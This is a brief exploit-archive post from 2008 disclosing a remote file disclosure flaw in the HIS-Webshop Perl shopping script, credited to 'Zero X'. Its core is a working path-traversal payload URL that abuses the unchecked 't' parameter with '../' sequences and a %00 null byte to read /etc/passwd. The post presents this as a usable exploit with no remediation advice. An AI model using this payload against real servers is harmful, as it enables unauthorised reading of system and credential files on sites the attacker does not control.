HIS-Webshop (his-webshop.pl t) Remote File Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : HIS-Webshop (his-webshop.pl t) Remote File Disclosure Vulnerability
# Published : 2008-03-24
# Author : Zero X
# Previous Title : PowerPHPBoard 1.00b Multiple Local File Inclusion Vulnerabilities
# Next Title : destar 0.2.2-5 Arbitrary Add Admin User Exploit

HIS-Webshop is a shopping-system written in Perl by www.shoppark.de
The script doesn?′t check the "t"-parameter.

Example:
http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00

<< Greetz Zero X >>

# www.Syue.com [2008-03-24]